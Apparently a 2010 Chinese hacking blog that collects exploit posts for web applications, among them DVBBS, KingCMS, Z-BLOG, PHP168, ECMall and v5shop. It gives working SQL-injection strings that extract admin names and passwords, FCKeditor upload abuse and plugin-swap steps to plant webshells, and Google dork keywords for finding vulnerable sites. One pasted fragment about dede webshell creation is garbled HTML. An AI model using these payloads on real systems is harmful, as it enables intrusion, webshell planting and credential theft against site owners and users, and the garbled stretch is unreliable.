GuLang's Blog - 漏洞相关

dvbbs php2.0 joinvipgroup.php注入0day

chenliangsx@gmail.com(admin) — Thu,02 Sep 2010 22:13:41 +0800

1,joinvipgroup.php  //注入

代码解析

Code:
function up_vipuser(){
global $lang,$db,$dv,$userid,$userinfo,$vipgroupuser;
$groupid=$_POST[''vipgroupid''];
$btype=$_POST[''Btype''];
$vipmoney=$_POST[''vipmoney''];
$vipticket=$_POST[''vipticket''];
if($groupid==0 or $vipmoney<0 or $vipticket<0){echo "@@";
   showmsg($lang[''join.info4'']);
   exit;
}
$issql=$db->scalar("Select count(1) FROM {$dv}usergroups Where parentgid=5 and usergroupid=''".intval($groupid)."''");echo $issql;
if($issql>0 AND ($sql=$db->query("Select usergroupid,title,usertitle,groupsetting,grouppic FROM {$dv}usergroups Where parentgid=5 and usergroupid=''".intval($groupid)."''"))){
   while ($arr=$db->fetch_array($sql)){
    $vipgroupsetting=explode(",",$arr[''groupsetting'']);
    $upsetting=explode($lang[''join.separator1''], $vipgroupsetting[71]);//''升级到该组所需金币数金币数§点券数§有效天数§最低天数
    if($btype==1){echo "???";
     $vipmoney=0;
     if(intval($upsetting[3])>0){
      $mustnum=$upsetting[3]*$upsetting[1]/$upsetting[2];
      if($mustnum>0){
       $mustnum=number_format($mustnum,0);
      }else{
       showmsg($lang[''join.info5'']);
       exit;
      }
     }
     if($userinfo[''userticket'']<$vipticket or $vipticket<$mustnum){
      showmsg($lang[''join.info6'']);
      exit;
     }
     $updats=$vipticket*$upsetting[2]/$upsetting[1];
     $updats=intval(number_format($updats,0));
    }else{echo "&&&";
     $vipticket=0;
     if($upsetting[3]>0){
      $mustnum=$upsetting[3]*$upsetting[0]/$upsetting[2];
      if($mustnum>0){
       $mustnum=number_format($mustnum,0);
      }else{
       showmsg($lang[''join.info5'']);
       exit;
      }
     }
                                 var_dump($userinfo[''usermoney'']<$vipmoney);

                                   var_dump($vipmoney<$mustnum);

     if($userinfo[''usermoney'']<$vipmoney || $vipmoney<$mustnum){echo "ri";
      showmsg($lang[''join.info7'']);
      exit;
     }
     $updats=$vipmoney*$upsetting[2]/$upsetting[0];
     $updats=intval(number_format($updats,0));
    }
    if($vipgroupuser===true){echo "%%%";
     $db->query("Update {$dv}user SET usergroupid=".$groupid.",userclass=''".$arr[''usertitle'']."'',titlepic=''".$arr[''grouppic'']."'',usermoney=usermoney-".$vipmoney.",userticket=userticket-".$vipticket.",vip_endtime=''".($userinfo[''vip_endtime'']+$updates*24*3600)."'' Where userid=".$userid."");
     $db->query("Update {$dv}online SET usergroupid=''$groupid'' Where userid=$userid");
    }else{echo "^^^";
     $db->query("Update {$dv}user SET usergroupid=".$groupid.",userclass=''".$arr[''usertitle'']."'',titlepic=''".$arr[''grouppic'']."'',usermoney=usermoney-".$vipmoney.",userticket=userticket-".$vipticket.",vip_endtime=''".(TIME_NOW+$updates*24*3600)."'',vip_startime=''".TIME_NOW."'' Where userid=".$userid."");
     $db->query("Update {$dv}online SET usergroupid=''$groupid'' Where userid=$userid");
    }
              ..............................................................
   $vipmoney变量没有过滤，利用前提是管理员设了vip会员组,有点金币:)
test

详细内容

http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" />验证码：http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清？点击更换" align="absmiddle" style="cursor:pointer" onclick="this.src=this.src+''?''" />

提交，提示修改成功，则我们已经成功修改模板路径。3.访问修改的文章：假设刚刚修改的文章的aid为2，则我们只需要访问：http://127.0.0.1/dede/plus/view.php?aid=2即可以在plus目录下生成webshell：1.php

KingCMS ASP 5.0/5.1 Fck编程器上传漏洞

chenliangsx@gmail.com(admin) — Thu,02 Sep 2010 22:09:30 +0800

影响版本：KingCMS ASP 5.0/5.1
官方地址：http://www.kingcms.com/
漏洞描述： KingCMS ASP是基于ASP+ACCESS构架的一款很不错的CMS系统，前台全部静态化处理，新一代 KingCMS 提供了更好的界面、更多的开发余地、更强大的扩展能力，现今也受到不少站长的欢迎。但是在没有正确设置系统的情况下会爆出一个致命的弱点，特别是针对比较懒的站长。

漏洞算不上0day，但是却具有0day的危害效果，主要是因管理为对后台路径和编辑器路径做更改，系统是使用FCKeditor编辑器，这个编辑器的漏洞大家都比较熟悉了，下面就给出具体利用方法。

利用前提：管理员未更改后台路径以及FCKeditor编辑器路径做更改。

后台地址：默认是/admin/system/login.asp，输入admin路径可自动跳转到登陆口。

编辑器路径：/admin/system/editor/

利用方式：访问http://www.xxx.com/admin/system/editor/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/qing.asp&NewFolderName=qing.asp后在/up_files/image/目录下创建一个明文qing.asp的文件夹。

然后访问http://www.xxx.com/admin/system/editor/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=../../connectors/asp/connector.asp，选择刚创建的qing.asp文件夹并上传图片木马，可以上传包含一句话内容的图片，然后使用一句话客户端连接。

另外该系统后台也是比较脆弱的，若能成功登陆后台拿webshell比较简单，后台中有个webftp的功能，可以上传任意文件。默认数据库地址为/db/King#Content#Management#System.mdb，下载的时候将#替换成%23后下载。

针对该系统的关键词未确定下来，主要是系统不好确定关键词，前台全部为静态的，有兴趣的朋友可以去官网下载一个来研究下

安全建议：升级fckeditor到最新版本。

文章转载自『非安全中国网』地址: http://www.sitedir.com.cn/exploit-1255.html

动网（DVBBS）PHP论坛preview.php代码执行漏洞

chenliangsx@gmail.com(admin) — Thu,02 Sep 2010 22:08:56 +0800

动网（DVBBS）论坛系统是一个采用PHP和MYSQL的数据架构的高性能网站论坛解决方案。

在文件preview.php中：
require printout('preview'); //第9行
……
函数printout在文件inc/ dv_clsmain.php中：
function printout($template,$ext="tpl.php"){ //第464行
文件最后包含了templates\default\ preview.tpl.php文件
……
在文件templates\default\ preview.tpl.php中：
$theBody =& Dv_CodeProcess($theBody, $tmpuserinfo, Ubblist($theBody).'39,', 1, 0); //第31行
& Dv_CodeProcess函数在文件inc/dv_code.php文件中：
function &Dv_CodeProcess(&$code,&$currUserInfo,$ubblists,$PostType=1,$sType=1) //第332行
……
$arrPattern[] = '#\[url\s*=\s*([^\]]+)](.*?)\[img](.+?)\[\/img](.*?)\[/url]#iesm'; //第415行
$arrRepl[] = '\'$2$4\'';
……
$returnval = preg_replace( $arrPattern ,$arrRepl ,$code ); //第861行
函数preg_replace当第一个参数的正则表达式有e符号的时候，第二个参数的字符串当做PHP代码执行。

Z-BLOG后台getshell方法

chenliangsx@gmail.com(admin) — Thu,29 Jul 2010 23:58:30 +0800

Z-BLOG后台利用插件拿WEBSHELL
怎么进后台自己想办法，进入后台
插件管理--TotoroⅡ插件，导出此插件，下载本地利用文本形式打开

base64加密的
PCVAIENPREVQQUdFPTY1MDAxICU+DQo8JQ0KJy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8v
Ly8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8N
CicvLyDmj5Lku7blupTnlKg6ICAgIFotQmxvZyAxLjcNCicvLyDmj5Lku7bliLbkvZw6ICAg
IA0KJy8vIOWkhyAgICDms6g6ICAgIA0KJy8vIOacgOWQjuS/ruaUue+8miAgIA0KJy8vIOac
gOWQjueJiOacrDogICAgDQonLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8v
Ly8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLw0KJT4NCjwlIE9w
dGlvbiBFeHBsaWNpdCAlPg0KPCUgT24gRXJyb3IgUmVzdW1lIE5leHQgJT4NCjwlIFJlc3Bv
bnNlLkNoYXJzZXQ9IlVURi04IiAlPg0KPCUgUmVzcG9uc2UuQnVmZmVyPVRydWUgJT4NCjwh
LS0gI2luY2x1ZGUgZmlsZT0iLi4vLi4vY19vcHRpb24uYXNwIiAtLT4NCjwhLS0gI2luY2x1
ZGUgZmlsZT0iLi4vLi4vZnVuY3Rpb24vY19mdW5jdGlvbi5hc3AiIC0tPg0KPCEtLSAjaW5j
bHVkZSBmaWxlPSIuLi8uLi9mdW5jdGlvbi9jX2Z1bmN0aW9uX21kNS5hc3AiIC0tPg0KPCEt
LSAjaW5jbHVkZSBmaWxlPSIuLi8uLi9mdW5jdGlvbi9jX3N5c3RlbV9saWIuYXNwIiAtLT4N
CjwhLS0gI2luY2x1ZGUgZmlsZT0iLi4vLi4vZnVuY3Rpb24vY19zeXN0ZW1fYmFzZS5hc3Ai
IC0tPg0KPCEtLSAjaW5jbHVkZSBmaWxlPSIuLi8uLi9mdW5jdGlvbi9jX3N5c3RlbV9ldmVu
dC5hc3AiIC0tPg0KPCEtLSAjaW5jbHVkZSBmaWxlPSIuLi8uLi9mdW5jdGlvbi9jX3N5c3Rl
bV9wbHVnaW4uYXNwIiAtLT4NCjwhLS0gI2luY2x1ZGUgZmlsZT0iLi4vLi4vcGx1Z2luL3Bf
Y29uZmlnLmFzcCIgLS0+DQo8JQ0KDQpDYWxsIFN5c3RlbV9Jbml0aWFsaXplKCkNCg0KJ+aj
gOafpemdnuazlemTvuaOpQ0KQ2FsbCBDaGVja1JlZmVyZW5jZSgiIikNCg0KJ+ajgOafpead
g+mZkA0KSWYgQmxvZ1VzZXIuTGV2ZWw+MSBUaGVuIENhbGwgU2hvd0Vycm9yKDYpIA0KDQpJ
ZiBDaGVja1BsdWdpblN0YXRlKCJUb3Rvcm8iKT1GYWxzZSBUaGVuIENhbGwgU2hvd0Vycm9y
KDQ4KQ0KJT4NCjwlDQoNCkRpbSBhY3QsZGVsaWQNCmFjdD1SZXF1ZXN0LkZvcm0oImFjdCIp
DQpkZWxpZD1SZXF1ZXN0LkZvcm0oImlkIikNCkRpbSBzdHJDb250ZW50DQpEaW0gc3RyWkNf
VE9UT1JPX0JBRFdPUkRfTElTVCxTdHJUTVAsTkVXX0JBRFdPUkQsYm9sVE9UT1JPX0RFTF9E
SVJFQ1RMWQ0Kc3RyQ29udGVudD1Mb2FkRnJvbUZpbGUoQmxvZ1BhdGggJiAiL1BMVUdJTi90
b3Rvcm8vaW5jbHVkZS5hc3AiLCJ1dGYtOCIpDQpDYWxsIExvYWRWYWx1ZUZvclNldHRpbmco
c3RyQ29udGVudCxUcnVlLCJTdHJpbmciLCJUT1RPUk9fQkFEV09SRF9MSVNUIixzdHJaQ19U
T1RPUk9fQkFEV09SRF9MSVNUKQ0KQ2FsbCBMb2FkVmFsdWVGb3JTZXR0aW5nKHN0ckNvbnRl
bnQsVHJ1ZSwiQm9vbGVhbiIsIlRPVE9ST19ERUxfRElSRUNUTFkiLGJvbFRPVE9ST19ERUxf
RElSRUNUTFkpDQpJZiBhY3Q9ImRlbGNtIiB0aGVuDQoNCglEaW0gb2JqQ29tbWVudA0KCVNl
dCBvYmpDb21tZW50PU5ldyBUQ29tbWVudA0KCUlmIG9iakNvbW1lbnQuTG9hZEluZm9ieUlE
KGRlbGlkKSBUaGVuDQoJDQoJCVN0clRNUD1UT1RPUk9fY2hlY2tTdHIob2JqQ29tbWVudC5I
b21lUGFnZSAmICJ8IiAmIG9iakNvbW1lbnQuQ29udGVudCxzdHJaQ19UT1RPUk9fQkFEV09S
RF9MSVNUKQ0KCQlzdHJaQ19UT1RPUk9fQkFEV09SRF9MSVNUPXN0clpDX1RPVE9ST19CQURX
T1JEX0xJU1QgJiBTdHJUTVANCgkJTkVXX0JBRFdPUkQ9U3RyVE1QDQoJCVJlc3BvbnNlLldy
aXRlIFRvdG9yb19kZWFsSXQob2JqQ29tbWVudCxib2xUT1RPUk9fREVMX0RJUkVDVExZKQ0K
DQoJRW5kIElmCQkNCgkJDQpFbHNlaWYgYWN0PSJkZWx0YiIgdGhlbg0KDQoJRGltIG9ialRy
YWNrQmFjaw0KCVNldCBvYmpUcmFja0JhY2s9TmV3IFRUcmFja0JhY2sNCglJZiBvYmpUcmFj
a0JhY2suTG9hZEluZm9ieUlEKGRlbGlkKSBUaGVuDQoJDQoJCVN0clRNUD1UT1RPUk9fY2hl
Y2tTdHIob2JqVHJhY2tCYWNrLlVSTCAmICJ8IiAmIG9ialRyYWNrQmFjay5FeGNlcnB0LHN0
clpDX1RPVE9ST19CQURXT1JEX0xJU1QpDQoJCXN0clpDX1RPVE9ST19CQURXT1JEX0xJU1Q9
c3RyWkNfVE9UT1JPX0JBRFdPUkRfTElTVCAmIFN0clRNUA0KCQlORVdfQkFEV09SRD1TdHJU
TVANCgkJUmVzcG9uc2UuV3JpdGUgVG90b3JvX2RlYWxJdChvYmpUcmFja0JhY2ssYm9sVE9U
T1JPX0RFTF9ESVJFQ1RMWSkNCgkNCglFbmQgSWYNCgkNCkVuZCBJZg0KDQpJZiBsZWZ0KHN0
clpDX1RPVE9ST19CQURXT1JEX0xJU1QsMSk9InwiIHRoZW4gc3RyWkNfVE9UT1JPX0JBRFdP
UkRfTElTVD1SaWdodChzdHJaQ19UT1RPUk9fQkFEV09SRF9MSVNULCBMZW4oc3RyWkNfVE9U
T1JPX0JBRFdPUkRfTElTVCkgLSAxKQ0KQ2FsbCBTYXZlVmFsdWVGb3JTZXR0aW5nKHN0ckNv
bnRlbnQsVHJ1ZSwiU3RyaW5nIiwiVE9UT1JPX0JBRFdPUkRfTElTVCIsc3RyWkNfVE9UT1JP
X0JBRFdPUkRfTElTVCkNCkNhbGwgU2F2ZVRvRmlsZShCbG9nUGF0aCAmICIvUExVR0lOL3Rv
dG9yby9pbmNsdWRlLmFzcCIsc3RyQ29udGVudCwidXRmLTgiLEZhbHNlKQ0KJ0lmIE5FV19C
QURXT1JEPD4iIiBUaGVuIFJlc3BvbnNlLndyaXRlICIsVG90b3Jv4oWh5paw5aKe5LiL5YiX
6buR6K+N77yaICIgJiBSaWdodChORVdfQkFEV09SRCwgTGVuKE5FV19CQURXT1JEKSAtIDEp
DQoNCiU+DQo8JQ0KRnVuY3Rpb24gVE9UT1JPX2NoZWNrU3RyKHN0clRvQ2hlY2ssQkFEV09S
RF9MSVNUKQ0KCQlEaW0gb2JqUmVnLG9iak1hdGNoZXMsTWF0Y2gNCgkJU2V0IG9ialJlZyA9
IE5ldyBSZWdFeHANCgkJb2JqUmVnLklnbm9yZUNhc2UgPSBUcnVlDQoJCW9ialJlZy5HbG9i
YWwgPSBUcnVlDQoJCW9ialJlZy5QYXR0ZXJuID0gImh0dHA6Ly8oW1x3LV0rXC4pK1tcdy1d
KyINCgkJU2V0IG9iak1hdGNoZXMgPSBvYmpSZWcuRXhlY3V0ZShzdHJUb0NoZWNrKQ0KCQlG
b3IgRWFjaCBNYXRjaCBJbiBvYmpNYXRjaGVzDQoJCQlJZiBUb3Rvcm9fY2hlY2tOZXdCYWRX
b3JkKE1hdGNoLlZhbHVlLEJBRFdPUkRfTElTVCAmIFRPVE9ST19jaGVja1N0cikgdGhlbg0K
CQkJCVRPVE9ST19jaGVja1N0cj1UT1RPUk9fY2hlY2tTdHIgJiAifCIgJiBSaWdodChNYXRj
aC5WYWx1ZSwgTGVuKE1hdGNoLlZhbHVlKSAtIDcpDQoJCQlFbmQgaWYNCgkJTmV4dA0KCQlT
ZXQgb2JqUmVnID0gTm90aGluZw0KCQlTZXQgb2JqTWF0Y2hlcyA9IE5vdGhpbmcNCgkJU2V0
IE1hdGNoID0gTm90aGluZw0KRW5kIEZ1bmN0aW9uDQoNCkZ1bmN0aW9uIFRvdG9yb19jaGVj
a05ld0JhZFdvcmQoY29udGVudCxCQURXT1JEX0xJU1QpDQoNCglUb3Rvcm9fY2hlY2tOZXdC
YWRXb3JkPVRydWUNCglEaW0gaSxqDQoJaj0wDQogICAgRGltIHN0ckZpbHRlcg0KICAgIHN0
ckZpbHRlciA9IFNwbGl0KEJBRFdPUkRfTElTVCwgInwiKQ0KCUZvciBpID0gMCBUbyBVQm91
bmQoc3RyRmlsdGVyKQ0KCQlJZiBzdHJGaWx0ZXIoaSk8PiIiIFRoZW4NCgkJCUlmIEluU3Ry
IChMQ2FzZShjb250ZW50KSwgTENhc2Uoc3RyRmlsdGVyKGkpKSkgPiAwIFRoZW4NCgkJCQlU
b3Rvcm9fY2hlY2tOZXdCYWRXb3JkPUZhbHNlDQoJCQkJRXhpdCBGb3INCgkJCUVuZCBJZg0K
CQlFbmQgSWYNCiAgICBOZXh0DQoNCkVuZCBGdW5jdGlvbg0KDQoNCkZ1bmN0aW9uIFRvdG9y
b19kZWFsSXQob2JqVG9EZWFsLGJvbERlbCkNCg0KCURpbSBsb2dJZA0KCWxvZ0lkPW9ialRv
RGVhbC5sb2dfSUQNCg0KCUlmIGJvbERlbCBUaGVuDQoJCUlmIG9ialRvRGVhbC5EZWwoKSBU
aGVuIFRvdG9yb19kZWFsSXQgPSAi5Yig6Zmk5oiQ5YqfIg0KCUVsc2UNCgkJb2JqVG9EZWFs
LmxvZ19JRD0tMS1vYmpUb0RlYWwubG9nX0lEDQoJCUlmIG9ialRvRGVhbC5Qb3N0IFRoZW4g
VG90b3JvX2RlYWxJdCA9ICLlt7LliqDlhaXlrqHmoLgiDQoJRW5kIElmDQoJDQoJQ2FsbCBC
dWlsZEFydGljbGUobG9nSWQsRmFsc2UsRmFsc2UpDQoJQ2FsbCBTZXRCbG9nSGludChOdWxs
LFRydWUsTnVsbCkNCglTZXQgb2JqVG9EZWFsID0gTm90aGluZwkNCgkNCkVuZCBGdW5jdGlv
bg0KJT4=
自己用一句话或小马去base64加密下替换之，修改Totoro/ajaxdel.asp文件名，再进后台删了这个插件重新上传安装下，你的SHELL地址就是PLUGIN/Totoro/xxxx.asp了

PHP168 V6.02 鸡肋漏洞

chenliangsx@gmail.com(admin) — Sat,24 Jul 2010 21:25:52 +0800

无意间发现个 PHP168 V6.02的 BUG
跟之前那个 job 下载任意文件性质差不多
只不过这次是把任意文件再拷贝为一份jpg出来！附加一个爆路

漏洞文件出现在 “do/cutimg.php”
if($action=="cutimg"){
$NewPic=str_replace($webdb[www_url],"",$uploadfile);
$NewPic=PHP168_PATH.$NewPic;
include(PHP168_PATH."inc/waterimage.php");
if($nextpic
虽然无法直接拿shell，但是对渗透又多了一条路可走~~
利用方法

华速网游交易平台oday

chenliangsx@gmail.com(admin) — Sat,24 Jul 2010 21:24:41 +0800

程序：华速网游交易平台
漏洞说明:上传，暴库
google关键字: inurl:list_buy.asp?class_1

EXP测试：
（复制代码保存为html文件）

上传完毕，右键查看源码，上传的马就在根目录之下。
如果上传不了的话，把的value的值修改为“/upfile/a.asp;aaa”，图片目录应该是可写的。

google关键字: inurl:list_buy.asp?class_1

如果上传失效的话，可以直接访问inc/config.asp文件，暴出数据库地址，进后台拿shell。

ECMall 2.2 app/groupbuy.app.php 延迟注射漏洞

chenliangsx@gmail.com(admin) — Sat,24 Jul 2010 21:23:46 +0800

代码分析
ECMall 社区电子商务系统(简称ECMall)是上海商派网络科技有限公司继ECShop 之后推出的又一个电子商务姊妹产品app\groupbuy.app.php:26:function index(){$id = empty($_GET[''id'']) ? 0 : $_GET[''id'']; //id未过滤if (!$id){$this->show_warning(‘no_such_groupbuy’);return false;}// 团购信息$group = $this->_groupbuy_mod->get(array(‘conditions’ => ‘group_id=’ . $id . ‘ AND gb.state<>’ . GROUP_PENDING, //好的，进去了！！‘join’ => ‘belong_store’,‘fields’ => ‘gb.*,s.owner_name’));if (empty($group)) //很多时候根本没有团购信息，所以是延迟注射了{$this->show_warning(‘no_such_groupbuy’);return;}

测试方法
【sitedir.com.cn】
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!/index.php?app=groupbuy&act=index&id=2 and if((select ascii(mid(user_name,1,1)) from ecm_member where user_id=1)=97,Benchmark(3000000,md5(1)),1)%23/index.php?app=groupbuy&act=index&id=2%20and%20if((select%20length(password)%20from%20ecm_member%20where%20user_id=1)=32,benchmark(1000000,md5(1)),1)–

v5shop 网上商城系统oday

chenliangsx@gmail.com(admin) — Sun,18 Jul 2010 12:51:45 +0800

漏洞文件：cart.aspx

关键字：services.aspxid=
inurl:scoreindex.aspx

默认后台地址：weblogin/Login.aspx

以下是测试EXP：

cart.aspx?act=buy&id=1 and (Select Top 1 char(124)%2BisNull(cast([Name] as varchar(8000)),char(32))%2Bchar(124)%2BisNull(cast([Pass] as varchar(8000)),char(32))%2Bchar(124) From (Select Top 4 [Name],[Pass] From [Web_Admin] Where 1=1 order by [Name],[Pass]) T order by [Name] desc,[Pass] desc)>0 --

weblogin/System_Config_Operate.aspx
后台上传水印.可以直接上传大马.

非安全中国安全建议：
目前官方没有发布相关补丁或升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本
www.v5shop.com.cn  （官网网站）
临时修复方法，把cart.aspx临时改名
文章转载自『非安全中国网』地址: http://www.sitedir.com.cn/exploit-1231.html